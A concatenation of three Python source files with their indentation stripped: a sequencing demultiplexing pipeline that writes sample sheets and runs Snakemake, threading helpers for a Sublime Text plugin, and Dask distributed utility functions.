barcode = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #1") from e
barcode_seq = barcode["sequence"]
else:
barcode_seq = ""
if library.get("barcode_seq2"):
barcode_seq2 = library.get("barcode_seq2")
elif library.get("barcode2"):
try:
barcode2 = client.barcodesetentry_retrieve(barcodesetentry=library.get("barcode2"))
except ApiException as e:
raise ApiProblemException("Problem querying API for barcode #2") from e
barcode_seq2 = barcode2["sequence"]
else:
barcode_seq2 = ""
if sequencer["dual_index_workflow"] == "B":
barcode_seq2 = reverse_complement(barcode_seq2)
if library["demux_reads"]:
demux_reads = library["demux_reads"]
else:
demux_reads = flowcell["demux_reads"] or flowcell["planned_reads"]
try:
demux_reads = return_bases_mask(flowcell["planned_reads"], demux_reads, "picard")
demux_reads_override.add(demux_reads)
except BaseMaskConfigException as e:
logging.warning("There is a problem with the bases mask. %s", e)
logging.exception(e, exc_info=True)
libraries.append(
{
"name": library["name"],
"reference": library["reference"],
"barcode": barcode_seq,
"barcode2": barcode_seq2,
"lanes": library["lane_numbers"],
"demux_reads_override": demux_reads,
}
)
# Get delivery type from flowcell information.
delivery_type = flowcell["delivery_type"].split("_")
# Normalize bases masks, decide if paired-end, find all custom bases_masks
planned_reads = flowcell["planned_reads"]
demux_reads = flowcell.get("demux_reads") or planned_reads
demux_reads = return_bases_mask(planned_reads, demux_reads, "picard")
flowcell["demux_reads"] = demux_reads # not used by bcl2fastq2
flowcell["demux_reads_override"] = list(sorted(demux_reads_override))
rta_version = run_parameters["rta_version"]
if "M" in flowcell["demux_reads"]: # TODO: refine condition
demux_tool = "picard"
elif config.demux_tool == "bcl2fastq" and rta_version >= (1, 18, 54):
demux_tool = "bcl2fastq2"
elif config.demux_tool == "bcl2fastq":
demux_tool = "bcl2fastq1"
else:
demux_tool = "picard"
logging.info("Using demux tool %s", demux_tool)
bcl2fastq2_params = {
"with_failed_reads": config.with_failed_reads,
"create_fastq_for_index_reads": flowcell["create_fastq_for_index_reads"],
"minimum_trimmed_read_length": flowcell["minimum_trimmed_read_length"],
"mask_short_adapter_reads": flowcell["mask_short_adapter_reads"],
}
logging.debug("Writing out demultiplexing configuration")
# Get barcode mismatch count or default.
if flowcell["barcode_mismatches"] is None:
if flowcell["rta_version"] == 1:
barcode_mismatches = 0
else:
barcode_mismatches = 1
else:
barcode_mismatches = flowcell["barcode_mismatches"]
with open(os.path.join(output_dir, "demux_config.json"), "wt") as jsonf:
config_json = {
"barcode_mismatches": barcode_mismatches,
"bcl2fastq2_params": bcl2fastq2_params,
"cores": config.cores,
"delivery_type": delivery_type,
"demux_tool": demux_tool,
"flowcell": {**flowcell, "libraries": libraries},
"input_dir": input_dir,
"lanes": config.lanes,
"output_dir": output_dir,
"rta_version": flowcell["rta_version"],
"tiles": config.tiles,
}
json.dump(config_json, jsonf)
logging.debug("Writing out sample sheet information")
remove_old_samplesheets(output_dir)
if demux_tool == "bcl2fastq1":
with open(os.path.join(output_dir, "SampleSheet.csv"), "wt") as csvf:
write_sample_sheet_v1(csv.writer(csvf), flowcell, libraries)
elif demux_tool == "picard":
write_sample_sheet_picard(flowcell, libraries, output_dir)
else:
write_sample_sheets_v2(flowcell, libraries, output_dir)
return flowcell # Everything is fine
def send_flowcell_success_message(client, flowcell, output_dir, *log_files):
if "seq" in flowcell["delivery_type"]:
# Remove log files that do not exist.
existing_log_files = [p for p in log_files if os.path.exists(p)]
missing_log_files = [p for p in log_files if not os.path.exists(p)]
# Create renamed (and potentially compressed files
path_in = os.path.join(output_dir, "multiqc/multiqc_%s")
with tempfile.TemporaryDirectory() as tempdir:
path_out = os.path.join(tempdir, "MultiQC_%%s_%s.%%s" % flowcell["vendor_id"])
with open(path_in % "report.html", "rb") as f_in:
with gzip.open(path_out % ("Report", "html.gz"), "wb") as f_out:
shutil.copyfileobj(f_in, f_out)
shutil.copyfile(path_in % "data.zip", path_out % ("Data", "zip"))
# Post with renamed files.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(
flowcell=flowcell,
version=__version__,
missing_log_files="\n".join(missing_log_files) or "none; all found",
),
attachments=list(
itertools.chain(
[path_out % ("Report", "html.gz"), path_out % ("Data", "zip")],
existing_log_files,
)
),
)
else:
# No sequences generated, no MultiQC created.
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing succeeded for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_SUCCESS.format(flowcell=flowcell, version=__version__),
attachments=list(log_files),
)
def send_flowcell_failure_message(client, flowcell, *log_files):
return client.message_send(
flowcell_uuid=flowcell["sodar_uuid"],
subject="Demultiplexing FAILED for flow cell %s" % flowcell["vendor_id"],
body=TPL_MSG_FAILURE.format(flowcell=flowcell, version=__version__),
attachments=log_files,
)
def async_tee_pipe(process, input_file, out_file, out_file2, mutex):
"""Async tee-piping from input_file to two output files using the mutex."""
logging_thread = Thread(target=tee_pipe, args=(process, input_file, out_file, out_file2, mutex))
logging_thread.start()
return logging_thread
def tee_pipe(process, input_file, out_file, out_stream, mutex):
"""Tee-piping from input_file to two output files using the mutex."""
while 1:
line = input_file.readline()
if not line and process.poll() is not None:
break
else:
with mutex:
out_stream.write(line.decode("utf-8"))
out_file.write(line)
def launch_snakemake(config, flowcell, output_dir, work_dir):
"""Launch Snakemake and execute the demultiplexing"""
logging.info("Temporary directory is %s", work_dir)
logging.info("Start Snakemake workflow for demultiplexing")
client = ApiClient(
api_url=config.api_url, api_token=config.api_token, project_uuid=config.project_uuid
)
output_log_dir = os.path.join(output_dir, "log")
output_qc_dir = os.path.join(output_dir, "multiqc")
drmaa_log_dirs = [
os.path.join(output_log_dir, "digestiflow-demux-snakemake.log.gz"),
os.path.join(output_log_dir, "digestiflow-demux.log"),
]
if "seq" in flowcell["delivery_type"]:
drmaa_log_dirs += [
os.path.join(output_qc_dir, "multiqc_data.zip"),
os.path.join(output_qc_dir, "multiqc_report.html"),
]
if config.only_post_message:
for path in drmaa_log_dirs:
if not os.path.exists(path):
raise MissingOutputFile("Cannot post message with %s missing" % path)
if config.only_post_message:
logging.info("Only posting message, not running demultiplexing itself.")
failure = False
else:
argv = [
"--snakefile",
PATH_SNAKEFILE,
"--directory",
work_dir,
"--configfile",
os.path.join(output_dir, "demux_config.json"),
"--cores",
config.cores,
"--drmaa-log-dir",
output_log_dir,
"--max-jobs-per-second",
config.max_jobs_per_second,
"--use-conda",
"--config",
]
if config.jobscript:
argv += ["--jobscript", config.jobscript]
if config.verbose:
argv += ["--verbose", "--printshellcmds"]
if config.drmaa:
argv += ["--drmaa", config.drmaa]
if config.cluster_config:
argv += ["--cluster-config", config.cluster_config]
try:
subprocess.check_output(["which", "mamba"], stderr=subprocess.PIPE)
argv += ["--conda-frontend", "mamba"]
except subprocess.CalledProcessError:
pass
argv = list(map(str, argv))
logging.info("Executing: snakemake %s", " ".join(argv))
try:
# Launch Snakemake
proc = subprocess.Popen(
["snakemake"] + argv, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
# Write output to temporary log file, to be attached later.
log_file_path = os.path.join(config.log_path, "digestiflow-demux-snakemake.log.gz")
with gzip.open(log_file_path, "wb") as log_file:
mutex = Lock()
logger_stderr = async_tee_pipe(proc, proc.stderr, log_file, sys.stderr, mutex)
logger_stdout = async_tee_pipe(proc, proc.stdout, log_file, sys.stdout, mutex)
logger_stderr.join()
logger_stdout.join()
# Copy out log file to log directory.
os.makedirs(output_log_dir, exist_ok=True)
shutil.copy(log_file_path, output_log_dir)
failure = proc.returncode != 0
except WorkflowError as e:
logging.warning("Running demultiplexing failed: %s", e)
failure = True
# Paths to tarballs with Illumina HTML reports.
paths_html_reports = [
os.path.join(output_dir, "html_report_%s.tar.gz" % bases_mask)
for bases_mask in flowcell["demux_reads_override"]
]
if not failure and not config.api_read_only:
message = send_flowcell_success_message(
client, flowcell, output_dir, log_file_path, *paths_html_reports
)
logging.info("Marking flowcell as complete...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="complete")
except ApiException as e:
logging.warning("Could not update conversion state to complete via API: %s", e)
logging.info("Done running Snakemake.")
elif flowcell and not config.api_read_only:
message = send_flowcell_failure_message(client, flowcell, log_file_path)
logging.info("Marking flowcell as failed...")
try:
client.flowcell_update(flowcell["sodar_uuid"], status_conversion="failed")
except ApiException as e:
logging.warning("Could not update conversion state to failed via API: %s", e)
else:
message = None
return (not failure, message, flowcell, client)
def perform_demultiplexing(config, input_dir, output_dir):
"""Prepare and execute the demultiplexing with the Snakemake workflow."""
logging.info("Starting to process input directory %s", input_dir)
logging.info("Output will go to %s", output_dir)
logging.debug("Creating output directory %s", output_dir)
os.makedirs(output_dir, exist_ok=True)
flowcell = create_sample_sheet(config, input_dir, output_dir)
if not flowcell:
return False, None, None, None
if config.work_dir:
logging.info("Using work directory %s", config.work_dir)
return launch_snakemake(config, flowcell, output_dir, config.work_dir)
elif config.keep_work_dir:
logging.info("Setup non-temporary work directory")
return launch_snakemake(config, flowcell, output_dir, tempfile.mkdtemp("-cubi-demux"))
else:
logging.info("Setup temporary work directory")
with tempfile.TemporaryDirectory("-cubi-demux") as work_dir:
return launch_snakemake(config, flowcell, output_dir, work_dir)
|
runtime.py
|
from concurrent.futures import Future, ThreadPoolExecutor
from functools import lru_cache, partial, wraps
import inspect
import threading
import uuid
import sublime
import sublime_plugin
MYPY = False
if MYPY:
from typing import Any, Callable, Dict, Iterator, Literal, Optional, Tuple, TypeVar
T = TypeVar('T')
F = TypeVar('F', bound=Callable[..., Any])
Callback = Tuple[Callable, Tuple[Any, ...], Dict[str, Any]]
ReturnValue = Any
savvy_executor = ThreadPoolExecutor(max_workers=1)
# `enqueue_on_*` functions emphasize that we run two queues and
# just put tasks on it. In contrast to `set_timeout_*` which
# emphasizes that we delay or defer something. (In particular
# `set_timeout_async` is somewhat a misnomer because both calls
# return immediately.)
# Both functions have the standard python callable interface
# `(f, *a, *kw)`, which is used in e.g. `partial` or
# `executor.submit`. This has the advantage that we can swap
# the functions to change the behavior without changing the
# arguments.
def enqueue_on_ui(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
sublime.set_timeout(partial(fn, *args, **kwargs))
def enqueue_on_worker(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
sublime.set_timeout_async(partial(fn, *args, **kwargs))
def enqueue_on_savvy(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
savvy_executor.submit(fn, *args, **kwargs)
def run_on_new_thread(fn, *args, **kwargs):
# type: (Callable, Any, Any) -> None
threading.Thread(target=fn, args=args, kwargs=kwargs).start()
def on_new_thread(fn):
@wraps(fn)
def wrapped(*a, **kw):
run_on_new_thread(fn, *a, **kw)
return wrapped
def run_as_future(fn, *args, **kwargs):
# type: (Callable[..., T], object, object) -> Future[T]
fut = Future() # type: Future[T]
def task():
fut.set_running_or_notify_cancel()
try:
rv = fn(*args, **kwargs)
except Exception as e:
fut.set_exception(e)
else:
fut.set_result(rv)
run_on_new_thread(task)
return fut
def run_or_timeout(fn, timeout):
cond = threading.Condition()
result = None
exc = None
def program():
nonlocal cond, exc, result
try:
result = fn()
except Exception as e:
exc = e
finally:
with cond:
cond.notify_all()
with cond:
run_on_new_thread(program)
if not cond.wait(timeout):
raise TimeoutError()
if exc:
raise exc
else:
return result
lock = threading.Lock()
COMMANDS = {} # type: Dict[str, Callback]
RESULTS = {} # type: Dict[str, ReturnValue]
def run_as_text_command(fn, view, *args, **kwargs):
# type: (Callable[..., T], sublime.View, Any, Any) -> Optional[T]
token = uuid.uuid4().hex
with lock:
COMMANDS[token] = (fn, (view, ) + args, kwargs)
view.run_command('gs_generic_text_cmd', {'token': token})
with lock:
# If the view has been closed, Sublime will not run
# text commands on it anymore (but also not throw).
# For now, we stay close, don't raise and just return
# `None`.
rv = RESULTS.pop(token, None)
return rv
def text_command(fn):
# type: (F) -> F
@wraps(fn)
def decorated(view, *args, **kwargs):
# type: (sublime.View, Any, Any) -> Optional[T]
return run_as_text_command(fn, view, *args, **kwargs)
return decorated # type: ignore[return-value]
@lru_cache()
def wants_edit_object(fn):
sig = inspect.signature(fn)
return 'edit' in sig.parameters
class gs_generic_text_cmd(sublime_plugin.TextCommand):
def run_(self, edit_token, cmd_args):
cmd_args = self.filter_args(cmd_args)
token = cmd_args['token']
with lock:
# Any user can "redo" text commands, but we don't want that.
try:
fn, args, kwargs = COMMANDS.pop(token)
except KeyError:
return
edit = self.view.begin_edit(edit_token, self.name(), cmd_args)
try:
if wants_edit_object(fn):
return self.run(token, fn, args[0], edit, *args[1:], **kwargs)
else:
return self.run(token, fn, *args, **kwargs)
finally:
self.view.end_edit(edit)
def run(self, token, fn, *args, **kwargs):
rv = fn(*args, **kwargs)
with lock:
RESULTS[token] = rv
THROTTLED_CACHE = {}
THROTTLED_LOCK = threading.Lock()
def throttled(fn, *args, **kwargs):
# type: (...) -> Callable[[], None]
token = (fn,)
action = partial(fn, *args, **kwargs)
with THROTTLED_LOCK:
THROTTLED_CACHE[token] = action
def task():
with THROTTLED_LOCK:
ok = THROTTLED_CACHE.get(token) == action
if ok:
action()
return task
AWAIT_UI_THREAD = 'AWAIT_UI_THREAD' # type: Literal["AWAIT_UI_THREAD"]
AWAIT_WORKER = 'AWAIT_WORKER' # type: Literal["AWAIT_WORKER"]
if MYPY:
HopperR = Iterator[Literal["AWAIT_UI_THREAD", "AWAIT_WORKER"]]
HopperFn = Callable[..., HopperR]
def cooperative_thread_hopper(fn):
# type: (HopperFn) -> Callable[..., None]
"""Mark given function as cooperative.
`fn` must return `HopperR` t.i. it must yield AWAIT_UI_THREAD
or AWAIT_UI_THREAD at some point.
When calling `fn` it will run on the same thread as the caller
until the function yields. It then schedules a task on the
desired thread which will continue execution the function.
It is thus cooperative in the sense that all other tasks
already queued will get a chance to run before we continue.
It is "async" in the sense that the function does not run
from start to end in a blocking manner but can be suspended.
However, it is sync till the first yield (but you could of
course yield on the first line!), only then execution returns
to the call site.
Be aware that, if the call site and the thread you request are
_not_ the same, you can get concurrent execution afterwards!
"""
def tick(gen, send_value=None):
try:
rv = gen.send(send_value)
except StopIteration:
return
except Exception as ex:
raise ex from None
if rv == AWAIT_UI_THREAD:
enqueue_on_ui(tick, gen)
elif rv == AWAIT_WORKER:
enqueue_on_worker(tick, gen)
def decorated(*args, **kwargs):
gen = fn(*args, **kwargs)
if inspect.isgenerator(gen):
tick(gen)
return decorated
|
utils.py
|
import asyncio
from asyncio import TimeoutError
import atexit
from collections import deque, OrderedDict, UserDict
from concurrent.futures import ThreadPoolExecutor
from contextlib import contextmanager
import functools
from hashlib import md5
import html
import inspect
import json
import logging
import multiprocessing
import os
import re
import shutil
import socket
from time import sleep
import importlib
from importlib.util import cache_from_source
import inspect
import sys
import tempfile
import threading
import warnings
import weakref
import pkgutil
import base64
import tblib.pickling_support
import xml.etree.ElementTree
try:
import resource
except ImportError:
resource = None
import dask
from dask import istask
# provide format_bytes here for backwards compatibility
from dask.utils import ( # noqa
format_bytes,
funcname,
format_time,
parse_bytes,
parse_timedelta,
)
import toolz
import tornado
from tornado import gen
from tornado.ioloop import IOLoop
try:
from tornado.ioloop import PollIOLoop
except ImportError:
PollIOLoop = None # dropped in tornado 6.0
from .compatibility import PYPY, WINDOWS, get_running_loop
from .metrics import time
try:
from dask.context import thread_state
except ImportError:
thread_state = threading.local()
logger = _logger = logging.getLogger(__name__)
no_default = "__no_default__"
def _initialize_mp_context():
if WINDOWS or PYPY:
return multiprocessing
else:
method = dask.config.get("distributed.worker.multiprocessing-method")
ctx = multiprocessing.get_context(method)
# Makes the test suite much faster
preload = ["distributed"]
if "pkg_resources" in sys.modules:
preload.append("pkg_resources")
from .versions import required_packages, optional_packages
for pkg, _ in required_packages + optional_packages:
try:
importlib.import_module(pkg)
except ImportError:
pass
else:
preload.append(pkg)
ctx.set_forkserver_preload(preload)
return ctx
mp_context = _initialize_mp_context()
def has_arg(func, argname):
"""
Whether the function takes an argument with the given name.
"""
while True:
try:
if argname in inspect.getfullargspec(func).args:
return True
except TypeError:
break
try:
# For Tornado coroutines and other decorated functions
func = func.__wrapped__
except AttributeError:
break
return False
def get_fileno_limit():
"""
Get the maximum number of open files per process.
"""
if resource is not None:
return resource.getrlimit(resource.RLIMIT_NOFILE)[0]
else:
# Default ceiling for Windows when using the CRT, though it
# is settable using _setmaxstdio().
return 512
@toolz.memoize
def _get_ip(host, port, family):
# By using a UDP socket, we don't actually try to connect but
# simply select the local address through which *host* is reachable.
sock = socket.socket(family, socket.SOCK_DGRAM)
try:
sock.connect((host, port))
ip = sock.getsockname()[0]
return ip
except EnvironmentError as e:
warnings.warn(
"Couldn't detect a suitable IP address for "
"reaching %r, defaulting to hostname: %s" % (host, e),
RuntimeWarning,
)
addr_info = socket.getaddrinfo(
socket.gethostname(), port, family, socket.SOCK_DGRAM, socket.IPPROTO_UDP
)[0]
return addr_info[4][0]
finally:
sock.close()
def get_ip(host="8.8.8.8", port=80):
"""
Get the local IP address through which the *host* is reachable.
*host* defaults to a well-known Internet host (one of Google's public
DNS servers).
"""
return _get_ip(host, port, family=socket.AF_INET)
def get_ipv6(host="2001:4860:4860::8888", port=80):
"""
The same as get_ip(), but for IPv6.
"""
return _get_ip(host, port, family=socket.AF_INET6)
def get_ip_interface(ifname):
"""
Get the local IPv4 address of a network interface.
KeyError is raised if the interface doesn't exist.
ValueError is raised if the interface does no have an IPv4 address
associated with it.
"""
import psutil
net_if_addrs = psutil.net_if_addrs()
if ifname not in net_if_addrs:
allowed_ifnames = list(net_if_addrs.keys())
raise ValueError(
"{!r} is not a valid network interface. "
"Valid network interfaces are: {}".format(ifname, allowed_ifnames)
)
for info in net_if_addrs[ifname]:
if info.family == socket.AF_INET:
return info.address
raise ValueError("interface %r doesn't have an IPv4 address" % (ifname,))
@contextmanager
def ignoring(*exceptions):
try:
yield
except exceptions as e:
pass
@gen.coroutine
def ignore_exceptions(coroutines, *exceptions):
""" Process list of coroutines, ignoring certain exceptions
>>> coroutines = [cor(...) for ...] # doctest: +SKIP
>>> x = yield ignore_exceptions(coroutines, TypeError) # doctest: +SKIP
"""
wait_iterator = gen.WaitIterator(*coroutines)
results = []
while not wait_iterator.done():
with ignoring(*exceptions):
result = yield wait_iterator.next()
results.append(result)
raise gen.Return(results)
async def All(args, quiet_exceptions=()):
""" Wait on many tasks at the same time
Err once any of the tasks err.
See https://github.com/tornadoweb/tornado/issues/1546
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
return results
async def Any(args, quiet_exceptions=()):
""" Wait on many tasks at the same time and return when any is finished
Err once any of the tasks err.
Parameters
----------
args: futures to wait for
quiet_exceptions: tuple, Exception
Exception types to avoid logging if they fail
"""
tasks = gen.WaitIterator(*map(asyncio.ensure_future, args))
results = [None for _ in args]
while not tasks.done():
try:
result = await tasks.next()
except Exception:
@gen.coroutine
def quiet():
""" Watch unfinished tasks
Otherwise if they err they get logged in a way that is hard to
control. They need some other task to watch them so that they
are not orphaned
"""
for task in list(tasks._unfinished):
try:
yield task
except quiet_exceptions:
pass
quiet()
raise
results[tasks.current_index] = result
break
return results
def sync(loop, func, *args, callback_timeout=None, **kwargs):
"""
Run coroutine in loop running in separate thread.
"""
# Tornado's PollIOLoop doesn't raise when using closed, do it ourselves
if PollIOLoop and (
(isinstance(loop, PollIOLoop) and getattr(loop, "_closing", False))
or (hasattr(loop, "asyncio_loop") and loop.asyncio_loop._closed)
):
raise RuntimeError("IOLoop is closed")
try:
if loop.asyncio_loop.is_closed(): # tornado 6
raise RuntimeError("IOLoop is closed")
except AttributeError:
pass
e = threading.Event()
main_tid = threading.get_ident()
result = [None]
error = [False]
@gen.coroutine
def f():
try:
if main_tid == threading.get_ident():
raise RuntimeError("sync() called from thread of running loop")
yield gen.moment
thread_state.asynchronous = True
future = func(*args, **kwargs)
if callback_timeout is not None:
future = asyncio.wait_for(future, callback_timeout)
result[0] = yield future
except Exception as exc:
error[0] = sys.exc_info()
finally:
thread_state.asynchronous = False
e.set()
loop.add_callback(f)
if callback_timeout is not None:
if not e.wait(callback_timeout):
raise TimeoutError("timed out after %s s." % (callback_timeout,))
else:
while not e.is_set():
e.wait(10)
if error[0]:
typ, exc, tb = error[0]
raise exc.with_traceback(tb)
else:
return result[0]
class LoopRunner:
"""
A helper to start and stop an IO loop in a controlled way.
Several loop runners can associate safely to the same IO loop.
Parameters
----------
loop: IOLoop (optional)
If given, this loop will be re-used, otherwise an appropriate one
will be looked up or created.
asynchronous: boolean (optional, default False)
If false (the default), the loop is meant to run in a separate
thread and will be started if necessary.
If true, the loop is meant to run in the thread this
object is instantiated from, and will not be started automatically.
"""
# All loops currently associated to loop runners
_all_loops = weakref.WeakKeyDictionary()
_lock = threading.Lock()
def __init__(self, loop=None, asynchronous=False):
current = IOLoop.current()
if loop is None:
if asynchronous:
self._loop = current
else:
# We're expecting the loop to run in another thread,
# avoid re-using this thread's assigned loop
self._loop = IOLoop()
self._should_close_loop = True
else:
self._loop = loop
self._should_close_loop = False
self._asynchronous = asynchronous
self._loop_thread = None
self._started = False
with self._lock:
self._all_loops.setdefault(self._loop, (0, None))
def start(self):
"""
Start the IO loop if required. The loop is run in a dedicated
thread.
If the loop is already running, this method does nothing.
"""
with self._lock:
self._start_unlocked()
def _start_unlocked(self):
assert not self._started
count, real_runner = self._all_loops[self._loop]
if self._asynchronous or real_runner is not None or count > 0:
self._all_loops[self._loop] = count + 1, real_runner
self._started = True
return
assert self._loop_thread is None
assert count == 0
loop_evt = threading.Event()
done_evt = threading.Event()
in_thread = [None]
start_exc = [None]
def loop_cb():
in_thread[0] = threading.current_thread()
loop_evt.set()
def run_loop(loop=self._loop):
loop.add_callback(loop_cb)
try:
loop.start()
except Exception as e:
start_exc[0] = e
finally:
done_evt.set()
thread = threading.Thread(target=run_loop, name="IO loop")
thread.daemon = True
thread.start()
loop_evt.wait(timeout=10)
self._started = True
actual_thread = in_thread[0]
if actual_thread is not thread:
# Loop already running in other thread (user-launched)
done_evt.wait(5)
if not isinstance(start_exc[0], RuntimeError):
if not isinstance(
start_exc[0], Exception
): # track down infrequent error
raise TypeError("not an exception", start_exc[0])
raise start_exc[0]
self._all_loops[self._loop] = count + 1, None
else:
assert start_exc[0] is None, start_exc
self._loop_thread = thread
self._all_loops[self._loop] = count + 1, self
def stop(self, timeout=10):
"""
Stop and close the loop if it was created by us.
Otherwise, just mark this object "stopped".
"""
with self._lock:
self._stop_unlocked(timeout)
def _stop_unlocked(self, timeout):
if not self._started:
return
self._started = False
count, real_runner = self._all_loops[self._loop]
if count > 1:
self._all_loops[self._loop] = count - 1, real_runner
else:
assert count == 1
del self._all_loops[self._loop]
if real_runner is not None:
real_runner._real_stop(timeout)
def _real_stop(self, timeout):
assert self._loop_thread is not None
if self._loop_thread is not None:
try:
self._loop.add_callback(self._loop.stop)
self._loop_thread.join(timeout=timeout)
with ignoring(KeyError): # IOLoop can be missing
self._loop.close()
finally:
self._loop_thread = None
def is_started(self):
"""
Return True between start() and stop() calls, False otherwise.
"""
return self._started
def run_sync(self, func, *args, **kwargs):
"""
Convenience helper: start the loop if needed,
run sync(func, *args, **kwargs), then stop the loop again.
"""
if self._started:
return sync(self.loop, func, *args, **kwargs)
else:
self.start()
try:
return sync(self.loop, func, *args, **kwargs)
finally:
self.stop()
@property
def loop(self):
return self._loop
@contextmanager
def set_thread_state(**kwargs):
old = {}
for k in kwargs:
try:
old[k] = getattr(thread_state, k)
except AttributeError:
pass
for k, v in kwargs.items():
setattr(thread_state, k, v)
try:
yield
finally:
for k in kwargs:
try:
v = old[k]
except KeyError:
delattr(thread_state, k)
else:
setattr(thread_state, k, v)
@contextmanager
def tmp_text(filename, text):
fn = os.path.join(tempfile.gettempdir(), filename)
with open(fn, "w") as f:
f.write(text)
try:
yield fn
finally:
if os.path.exists(fn):
os.remove(fn)
def clear_queue(q):
while not q.empty():
q.get_nowait()
def is_kernel():
""" Determine if we're running within an IPython kernel
>>> is_kernel()
False
"""
# http://stackoverflow.com/questions/34091701/determine-if-were-in-an-ipython-notebook-session
if "IPython" not in sys.modules: # IPython hasn't been imported
return False
from IPython import get_ipython
# check for `kernel` attribute on the IPython instance
return getattr(get_ipython(), "kernel", None) is not None
hex_pattern = re.compile("[a-f]+")
@functools.lru_cache(100000)
def key_split(s):
"""
>>> key_split('x')
'x'
>>> key_split('x-1')
'x'
>>> key_split('x-1-2-3')
'x'
>>> key_split(('x-2', 1))
'x'
>>> key_split("('x-2', 1)")
'x'
>>> key_split("('x', 1)")
'x'
>>> key_split('hello-world-1')
'hello-world'
>>> key_split(b'hello-world-1')
'hello-world'
>>> key_split('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split(None)
'Other'
>>> key_split('x-abcdefab') # ignores hex
'x'
"""
if type(s) is bytes:
s = s.decode()
if type(s) is tuple:
s = s[0]
try:
words = s.split("-")
if not words[0][0].isalpha():
result = words[0].split(",")[0].strip("'(\"")
else:
result = words[0]
for word in words[1:]:
if word.isalpha() and not (
len(word) == 8 and hex_pattern.match(word) is not None
):
result += "-" + word
else:
break
if len(result) == 32 and re.match(r"[a-f0-9]{32}", result):
return "data"
else:
if result[0] == "<":
result = result.strip("<>").split()[0].split(".")[-1]
return result
except Exception:
return "Other"
def key_split_group(x):
"""A more fine-grained version of key_split
>>> key_split_group(('x-2', 1))
'x-2'
>>> key_split_group("('x-2', 1)")
'x-2'
>>> key_split_group('ae05086432ca935f6eba409a8ecd4896')
'data'
>>> key_split_group('<module.submodule.myclass object at 0xdaf372')
'myclass'
>>> key_split_group('x')
>>> key_split_group('x-1')
"""
typ = type(x)
if typ is tuple:
return x[0]
elif typ is str:
if x[0] == "(":
return x.split(",", 1)[0].strip("()\"'")
elif len(x) == 32 and re.match(r"[a-f0-9]{32}", x):
return "data"
elif x[0] == "<":
return x.strip("<>").split()[0].split(".")[-1]
else:
return ""
elif typ is bytes:
return key_split_group(x.decode())
else:
return ""
@contextmanager
def log_errors(pdb=False):
from .comm import CommClosedError
try:
yield
except (CommClosedError, gen.Return):
raise
except Exception as e:
try:
logger.exception(e)
except TypeError: # logger becomes None during process cleanup
pass
if pdb:
import pdb
pdb.set_trace()
raise
def silence_logging(level, root="distributed"):
"""
Change all StreamHandlers for the given logger to the given level
"""
if isinstance(level, str):
level = getattr(logging, level.upper())
old = None
logger = logging.getLogger(root)
for handler in logger.handlers:
if isinstance(handler, logging.StreamHandler):
old = handler.level
handler.setLevel(level)
return old
@toolz.memoize
def ensure_ip(hostname):
""" Ensure that address is an IP address
Examples
--------
>>> ensure_ip('localhost')
'127.0.0.1'
>>> ensure_ip('123.123.123.123') # pass through IP addresses
'123.123.123.123'
"""
# Prefer IPv4 over IPv6, for compatibility
families = [socket.AF_INET, socket.AF_INET6]
for fam in families:
try:
results = socket.getaddrinfo(
hostname, 1234, fam, socket.SOCK_STREAM # dummy port number
)
except socket.gaierror as e:
exc = e
else:
return results[0][4][0]
raise exc
tblib.pickling_support.install()
def get_traceback():
exc_type, exc_value, exc_traceback = sys.exc_info()
bad = [
os.path.join("distributed", "worker"),
os.path.join("distributed", "scheduler"),
os.path.join("tornado", "gen.py"),
os.path.join("concurrent", "futures"),
]
while exc_traceback and any(
b in exc_traceback.tb_frame.f_code.co_filename for b in bad
):
exc_traceback = exc_traceback.tb_next
return exc_traceback
def truncate_exception(e, n=10000):
""" Truncate exception to be about a certain length """
if len(str(e)) > n:
try:
return type(e)("Long error message", str(e)[:n])
except Exception:
return Exception("Long error message", type(e), str(e)[:n])
else:
return e
def tokey(o):
""" Convert an object to a string.
Examples
--------
>>> tokey(b'x')
b'x'
>>> tokey('x')
'x'
>>> tokey(1)
'1'
"""
typ = type(o)
if typ is str or typ is bytes:
return o
else:
return str(o)
def validate_key(k):
"""Validate a key as received on a stream.
"""
typ = type(k)
if typ is not str and typ is not bytes:
raise TypeError("Unexpected key type %s (value: %r)" % (typ, k))
def _maybe_complex(task):
""" Possibly contains a nested task """
return (
istask(task)
or type(task) is list
and any(map(_maybe_complex, task))
or type(task) is dict
and any(map(_maybe_complex, task.values()))
)
def convert(task, dsk, extra_values):
if type(task) is list:
return [convert(v, dsk, extra_values) for v in task]
if type(task) is dict:
return {k: convert(v, dsk, extra_values) for k, v in task.items()}
if istask(task):
return (task[0],) + tuple(convert(x, dsk, extra_values) for x in task[1:])
try:
if task in dsk or task in extra_values:
return tokey(task)
except TypeError:
pass
return task
def str_graph(dsk, extra_values=()):
return {tokey(k): convert(v, dsk, extra_values) for k, v in dsk.items()}
def seek_delimiter(file, delimiter, blocksize):
""" Seek current file to next byte after a delimiter bytestring
This seeks the file to the next byte following the delimiter. It does
not return anything. Use ``file.tell()`` to see location afterwards.
Parameters
----------
file: a file
delimiter: bytes
a delimiter like ``b'\n'`` or message sentinel
blocksize: int
Number of bytes to read from the file at once.
"""
if file.tell() == 0:
return
last = b""
while True:
current = file.read(blocksize)
if not current:
return
full = last + current
try:
i = full.index(delimiter)
file.seek(file.tell() - (len(full) - i) + len(delimiter))
return
except ValueError:
pass
last = full[-len(delimiter) :]
